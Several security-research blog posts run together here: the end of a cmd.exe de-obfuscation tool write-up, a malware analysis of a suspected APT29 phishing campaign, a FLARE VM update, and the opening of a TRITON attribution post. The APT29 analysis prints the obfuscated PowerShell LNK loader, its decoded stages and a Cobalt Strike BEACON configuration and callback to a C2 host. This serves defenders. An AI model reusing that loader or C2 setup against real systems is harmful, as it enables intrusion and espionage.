Because users can redirect multiple I/O streams in a single command, cmd.exe represents I/O redirection with a linked list. For example, the command in Listing 1 shows redirection of standard output (stream #1 is implicit) to shares.txt and standard error (stream #2 is explicitly referenced) to errors.txt.

net use > shares.txt 2>errors.txt

Listing 1: Command-line I/O redirection example

Figure 5 shows the command data structure and the I/O redirection linked list in block diagram format.


Figure 5: Command data structure diagram

By inspection, I found that cmd!Dispatch is responsible for executing both shell built-ins and external programs, so hooking it, unlike breaking on CreateProcess, will not miss commands that do not result in process creation. Based on these findings, I wrote a flare-qdb script to parse and dump commands as they are executed.
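
To give a feel for what that parsing involves, the sketch below walks a command structure and its redirection linked list over a flat memory snapshot. The field offsets, and the idea of treating addresses as offsets into a captured buffer, are hypothetical placeholders; the real layout is the one recovered in WinDbg (Figure 4 and Figure 5), and the actual De-DOSfuscator performs these reads through flare-qdb's debugger interface.

# Illustrative walk of the command structure and I/O redirection linked list.
# ALL OFFSETS ARE HYPOTHETICAL placeholders for the layout recovered in WinDbg;
# addresses are treated as offsets into a flat memory snapshot for simplicity.
import struct

CMD_OFF = 0x00     # hypothetical: pointer to the command string
ARGS_OFF = 0x08    # hypothetical: pointer to the argument string
REDIR_OFF = 0x10   # hypothetical: pointer to the first redirection node
NEXT_OFF = 0x00    # hypothetical: "next" pointer within a redirection node
TARGET_OFF = 0x08  # hypothetical: pointer to the redirection target string

def read_ptr(mem, addr):
    """Read a 64-bit little-endian pointer."""
    return struct.unpack_from("<Q", mem, addr)[0]

def read_wstr(mem, addr):
    """Read a NUL-terminated UTF-16LE string."""
    end = addr
    while end < len(mem) and mem[end:end + 2] != b"\x00\x00":
        end += 2
    return mem[addr:end].decode("utf-16-le")

def dump_command(mem, cmd_struct):
    """Rebuild 'command args -> target ...' from the parsed-command structure."""
    parts = [read_wstr(mem, read_ptr(mem, cmd_struct + CMD_OFF)),
             read_wstr(mem, read_ptr(mem, cmd_struct + ARGS_OFF))]
    node = read_ptr(mem, cmd_struct + REDIR_OFF)
    while node:  # walk the linked list of I/O redirections
        parts.append("-> " + read_wstr(mem, read_ptr(mem, node + TARGET_OFF)))
        node = read_ptr(mem, node + NEXT_OFF)
    return " ".join(p for p in parts if p)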

Introducing De-DOSfuscator

De-DOSfuscator uses flare-qdb and Vivisect to hook the Dispatch function in cmd.exe and parse commands from memory. The De-DOSfuscator script runs in a 64-bit Python 2 interpreter and dumps commands to both the console and a log file. The script comes with the latest version of flare-qdb and is installed as a Python entry point named dedosfuscator.exe.

De-DOSfuscator relies on the location of the non-exported Dispatch function to log commands, and this location varies per system. For convenience, if an Internet connection is available, De-DOSfuscator automatically retrieves the function’s offset from Microsoft’s symbol server. To allow offline use, you can supply the path to a copy of cmd.exe from your offline machine to the --getoff switch to obtain this offset, and then supply that output as the argument to the --useoff switch on your offline machine to tell De-DOSfuscator where the function is located. Alternately, you can use De-DOSfuscator with a downloaded PDB or a local symbol cache containing the correct symbols.

Figure 6 demonstrates getting and using the offset in a single session. Note that for this to work in an isolated VM, you would instead specify the path to a copy of the guest’s command interpreter specific to that VM.


Figure 6: Getting and using offsets and testing De-DOSfuscator

This works great on the BatchEncrypted script in Figure 1. Let’s have a look.

Results

Figure 7 shows the log created by De-DOSfuscator after running XYNT.bat. Hundreds of lines of SET statements progressively build environment variables for composing further commands. Keen eyes will also note a misspelling of the endlocal command-line extension keyword.


Figure 7: Beginning of dumped commands

These environment variable manipulations give way to real commands as shown in Figure 8. One of the script’s first actions is to use reg.exe to check the NUMBER_OF_PROCESSORS environment variable. This analysis system only had one vCPU, which can be seen in the set "a=1" output on line 620. After this, the script executes goto del, which branches to a batch label that ultimately deletes the script and other dropped files.


Figure 8: Anti-sandbox measure

This is a batch-oriented spin on a common sandbox evasion trick. It works because many malware analysis sandboxes run with a single CPU to minimize hypervisor resources, whereas most modern systems have at least two CPU cores. Now that we can easily read the script’s commands, it is trivial to circumvent this evasion by, for example, increasing the number of vCPUs available to the VM. Figure 9 shows De-DOSfuscator log after inducing the rest of the code to run.


Figure 9: After circumventing anti-sandbox measure

XYNT.bat calls a dropped binary to create and start a Windows service for persistence. The largest dropped binary is a variant of the XMRig cryptocurrency miner, and many of the services and executables referenced by the script also appear to be cryptocurrency-related.

Happy Easter

Easter is a long way off, but I must present you with a very early Easter Egg because it is such a neat little find. During my journey through cmd.exe, I noticed a variable named fDumpParse with only one cross-reference, which seemed to control an interesting behavior. The lone cross-reference and the relevant code are shown in Figure 10. Although fDumpParse is inaccessible anywhere else in the code, it controls whether a function is called to dump information about the command that has been parsed.


Figure 10: fDumpParse evaluation and cross-refs (EDI is NULL)

To experiment with this, you can use De-DOSfuscator’s --fDumpParse switch. You will then be greeted with a command prompt that is more transparent about what it has parsed. Figure 11 shows an example along with a graphical representation of the abstract syntax tree (AST) of parsed command tokens.


Figure 11: Command interpreter with fDumpParse set

Microsoft probably inserted the fDumpParse flag so developers could debug issues with cmd.exe. Unfortunately, as nifty as this is, it has drawbacks for bulk de-obfuscation:

  • This output is harder to read than plain commands, because it dumps the tree in preorder traversal rather than in the order in which the command was typed.
  • Output copied from the console may contain extraneous line breaks depending on the console host program’s text wrapping behavior.
  • Scrolling in the command interpreter to read or copy output can be tedious.
  • The console buffer is limited, so not everything may be captured.
  • Malicious script authors can still use the CLS command to clear the screen and make all the fDumpParse output disappear.
  • Gratuitous joining of commands with command separators (as found in XYNT.bat) yields unreadable ASTs that exceed the console width and wrap around, as in Figure 12.


Figure 12: fDumpParse result exceeding console width

Consequently, fDumpParse is not ideal for de-obfuscating large, malicious batch files; however, it is still interesting and useful for de-obfuscating short scripts or one-off commands. You can get the offset De-DOSfuscator needs for offline use via --getoff and use it via --useoff, as with normal operation.

Wrapping Up

I have given you an example of a heavily obfuscated command script and I have shared a useful tool for de-obfuscating it, along with the analytical steps that I followed to synthesize it. The De-DOSfuscator script code comes with the latest version of flare-qdb and is accessible as a script entry point (dedosfuscator.exe) when you install flare-qdb. It is my hope that this not only helps you to conveniently analyze malicious batch scripts, but also inspires you to devise your own creative ways to employ flare-qdb against malware.

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email, and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file. The shortcut launched both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, which allows us to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018 phishing campaign and the suspected APT29 phishing campaign of 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including use of the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering the historical use of deception by Russian intelligence services. It has also been over a year since we conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.]com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK files. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d) contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

Time                 | Event                                         | Source
2018-10-15 15:35:19Z | pandorasong[.]com registered                  | Registrant Information
2018-10-15 17:39:00Z | pandorasong[.]com SSL certificate established | Certificate Transparency
2018-10-15 18:52:06Z | Cobalt Strike server established              | Scan Data
2018-11-02 10:25:58Z | LNK weaponized                                | LNK Metadata
2018-11-13 17:58:41Z | 3fccf531ff0ae6fedd7c586774b17a2d modified     | Archive Metadata
2018-11-14 01:48:34Z | 658c6fe38f95995fa8dc8f6cfe41df7b modified     | Archive Metadata
2018-11-14 08:23:10Z | First observed phishing e-mail sent           | Telemetry

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass particular detection logic. For example, the command uses 'FromBase'+0x40+'String' in place of FromBase64String, the .NET method used to decode Base64; when evaluated, 0x40 (decimal 64) is converted to a string and concatenated, rebuilding the original method name.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;
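
For analysts who prefer to carve the next stage statically rather than execute it, the same extraction is easy to reproduce in a few lines of Python. The offsets are the ones hard-coded in the decoded loader above; only the output handling is our own.

# Statically reproduce the loader's extraction: read ds7002.lnk from offset
# 0x5e2be to 0x623b6 and Base64-decode the result to recover the next stage.
import base64

START, END = 0x5E2BE, 0x623B6  # offsets hard-coded in the decoded loader above

with open("ds7002.lnk", "rb") as f:
    f.seek(START)
    blob = f.read(END - START)

next_stage = base64.b64decode(blob).decode("ascii")
print(next_stage)  # the PowerShell loader that carves the decoy PDF and BEACON DLL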

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it is clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscation of the strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown below. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF")
Invoke-Item $((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat")
if ($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",") $("PointFunctionCall") }

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation and initialization, the malware made the following callback to the C2 server pandorasong[.]com over TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora profile, and may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache
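
Even with the customized malleable C2 profile, the observed request leaves room for network detection. As a rough illustration only, keyed to this single sample rather than offered as a production signature, the following sketch flags HTTP requests that match the beacon's URI and header pattern.

# Rough illustration of matching the observed BEACON request pattern.
# Keyed to the single sample above; NOT a production detection signature.
import re

BEACON_URI = re.compile(r"^/access/\?version=\d+&lid=\d+&token=[A-Za-z]{64,}$")

def matches_observed_beacon(method, uri, headers):
    """Return True for requests shaped like the sample GET request above."""
    return (
        method == "GET"
        and bool(BEACON_URI.match(uri))
        and headers.get("Host", "").lower() == "pandorasong.com"
        and "GetContentFeatures.DLNA.ORG" in headers
    )

# Example:
# matches_observed_beacon("GET", "/access/?version=4&lid=1582502724&token=" + "a" * 200,
#                         {"Host": "pandorasong.com", "GetContentFeatures.DLNA.ORG": "1"})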

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

Indicator | Description
dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org | Phishing email address from likely compromised legitimate server
Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you | Phishing email subject
https://www.jmj[.]com/personal/nauerthn_state_gov/* | Malware hosting location on likely compromised legitimate domain
pandorasong[.]com | BEACON C2
95.216.59[.]92 | Resolution of pandorasong[.]com
2b13b244aafe1ecace61ea1119a1b2ee | SSL certificate for pandorasong[.]com
3fccf531ff0ae6fedd7c586774b17a2d | Malicious ZIP archive MD5
658c6fe38f95995fa8dc8f6cfe41df7b | Benign ZIP archive MD5
6ed0020b0851fb71d5b0076f4ee95f3c | Malicious LNK file MD5
313f4808aa2a2073005d219bc68971cd | Benign decoy PDF MD5
16bbc967a8b6a365871a05c74a4f345b | BEACON DLL MD5
%APPDATA%\Local\cyzfc.dat | BEACON DLL file path
%TEMP%\ds7002.PDF | Benign decoy PDF file path

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

  • Network Security:
    • Malware.Archive
    • Malware.Binary.lnk
    • Suspicious.Backdoor.Beacon
  • Endpoint Security:
    • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
    • Generic.mg.16bbc967a8b6a365
  • Threat Analytics Platform:
    • WINDOWS METHODOLOGY [PowerShell Base64 String]
    • WINDOWS METHODOLOGY [Rundll32 Roaming]
    • WINDOWS METHODOLOGY [PowerShell Script Block Warning]
    • WINDOWS METHODOLOGY [Base64 Char Args]
    • TADPOLE DOWNLOADER [Rundll Args]
    • INTEL HIT - IP [Structured Threat Reputation-Based]
    • INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]
    • INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]
    • INTEL HIT - FILE HASH [Structured Threat Reputation-Based]

Table 3: FireEye product detections

FLARE VM Update

FLARE VM is a first-of-its-kind reverse engineering and malware analysis distribution for the Windows platform. Since its introduction in July 2017, FLARE VM has been trusted and used by many reverse engineers, malware analysts, and security researchers as their go-to environment for analyzing malware. Just like the ever-evolving security industry, FLARE VM has gone through many major changes to better support our users’ needs. FLARE VM now has a new installation, upgrade, and uninstallation process, a long-anticipated feature requested by our users. FLARE VM also includes many new tools such as IDA 7.0, radare2, and YARA. We would like to share these updates, especially the new installation process.

Installation

We strongly recommend you use FLARE VM within a virtualized environment for malware analysis to protect and isolate your physical device and network from malicious activities. We assume you already have experience setting up and configuring your own virtualized environment. Please create a new virtual machine (VM) and perform a fresh installation of Windows. FLARE VM is designed to be installed on Windows 7 Service Pack 1 or newer, so you can select the version of Windows that best suits your needs. From this point forward, all installation steps should be performed within your VM.

Once you have a VM with a fresh installation of Windows, use one of the following URLs to download the compressed FLARE VM repository onto your VM:

  • https://github.com/fireeye/flare-vm
  • https://flarevm.info


Figure 1: Download FLARE VM repo

Then, use the following steps to install FLARE VM:

  1. Decompress the FLARE VM repository to a directory of your choosing.
  2. Start a new session of PowerShell with escalated privileges. FLARE VM attempts to install additional software and modify system settings; therefore, escalated privileges are required for installation.
  3. Within PowerShell, change directory to the location where you have decompressed the FLARE VM repository.
  4. Enable unrestricted execution policy for PowerShell by executing the following command and answering “Y” when prompted by PowerShell: Set-ExecutionPolicy unrestricted
  5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. FLARE VM needs the current user’s password to automatically login after a reboot when installing. Optionally, you can specify the current user’s password by passing the “-password <current_user_password>” at the command line.


Figure 2: Start PowerShell as administrator


Figure 3: Ready to install FLARE VM

The rest of the installation process is fully automated. Depending upon your internet speed, the entire installation may take up to one hour to finish. The VM also reboots multiple times due to the requirements of the numerous software installations. Once the installation completes, the PowerShell prompt remains open, waiting for you to press any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 4: FLARE VM installation completes

Congratulations! You have successfully installed FLARE VM. At this point we recommend you power off the VM, switch the VM networking mode to Host-Only, and then take a snapshot to save a clean state of your analysis VM.

Improvement

The biggest improvement to FLARE VM is the ability to perform a proper update and uninstallation. The older version of FLARE VM came as a PowerShell script that installed many Chocolatey packages one at a time; therefore, we were unable to include new packages when updating FLARE VM. In the past, our users had to reinstall FLARE VM completely, which is time-consuming, or manually install the new package, which is error prone. To solve this issue, we have converted FLARE VM itself into a Chocolatey package. Whenever a new tool is available, we will also release a new version of FLARE VM. With this new design, we can simply execute “choco upgrade all” to get the newest version of FLARE VM along with any new packages we have released. You can also safely uninstall all FLARE VM packages by executing “choco uninstall flarevm.installer.flare”.

Our new FLARE VM is also updated to use Python 3.7 as the default Python interpreter. As a result, many older Python scripts may fail to execute. To maintain support for older scripts, we keep Python 2.7 installed in parallel with Python 3.7. You can easily switch between versions by using the Python launcher: run “py -2.7 <path_to_python_script>” to use Python 2.7, or “py <path_to_python_script>” to use the default Python 3.7 interpreter. For more details on the Python launcher, please refer to the following URL: https://docs.python.org/3/using/windows.html#launcher.

Additionally, the new FLARE VM changes the location where Fakenet-NG saves its output when launched via the shortcut in the FLARE folder or taskbar pin. Instead of saving directly to the desktop, to reduce clutter, Fakenet-NG will store all its output in “Desktop\fakenet_logs”.

Compared to older versions this version of FLARE VM comes with many new tools and software packages. Most notably, this release adds the following:

  • IDA Free 7.0
  • radare2 to support 64-bit disassembly
  • The labs for the Practical Malware Analysis book
  • pdfid, pdf-parser, and PdfStreamdumper to analyze malicious PDF documents
  • The Malcode Analyst Pack
  • Yara for signature matching
  • The Cygwin Unix-like environment on Windows
  • PowerShell transcription and script block logging
    • PowerShell transcripts can be found in “Desktop\PS_Transcripts”

Available Packages

While we attempt to make the tools available as shortcuts within the FLARE folder, several are available from the command line only. Please see the online documentation for the most up-to-date list. Here is an incomplete list of some major tools available in FLARE VM:

  • Disassemblers:
    • IDA Free 5.0 and IDA Free 7.0
    • Binary Ninja
    • Radare2 and Cutter
  • Debuggers:
    • OllyDbg and OllyDbg2
    • x64dbg
    • Windbg
  • File Format parser:
    • CFF Explorer, PEView, PEStudio
    • PdfStreamdumper, pdf-parser, pdfid
    • ffdec
    • offvis and officemalscanner
    • PE-bear
  • Decompilers:
    • RetDec
    • Jd-gui and bytecode-viewer
    • dnSpy
    • IDR
    • VBDecompiler
    • Py2ExeDecompiler
  • Monitoring tools:
    • SysInternal suite
    • RegShot
  • Utilities:
    • Hex Editors (010 editor, HxD and File Insight)
    • FLOSS (FireEye Labs Obfuscated String Solver)
    • Fakenet-NG
    • Yara
    • Malware Analyst Pack

Conclusion

The FLARE team continues to support and improve FLARE VM to make it the de facto distribution for security research, incident response, and malware analysis on the Windows platform. We greatly appreciate the numerous bug reports, tool requests, and feature recommendations from everyone. We hope FLARE VM, along with many other FLARE open source projects, helps you do your work better, easier, and faster.

We are always looking for talented folks to join our team. The FLARE Team may be a good place for you if:

  • You eat, sleep, and speak disassembly and malware all day long.
  • You would like to push the state of the art for reverse engineering and malware analysis.

Please check out our careers page, or send us an email. Happy Reversing!

TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers

Overview

In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility. We now track this activity set as TEMP.Veles. In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.

TRITON Intrusion Demonstrates Russian Links; Likely Backed by Russian Research Institute

FireEye Intelligence assesses with high confidence that the intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The factors supporting this assessment are detailed below. We present as much public information as possible, but have withheld sensitive details that further contribute to our high confidence.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
